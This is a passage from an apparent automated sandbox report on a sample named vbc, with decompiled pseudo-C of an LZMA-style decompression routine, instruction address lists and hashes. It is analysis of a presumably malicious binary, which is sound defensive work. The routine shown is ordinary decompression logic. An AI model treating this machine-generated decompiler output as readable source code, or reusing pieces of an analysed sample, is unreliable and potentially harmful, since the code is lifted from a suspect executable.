											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00000000
                          0x0040676f
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00406811
                          0x00000000
                          0x00406686

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                          • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
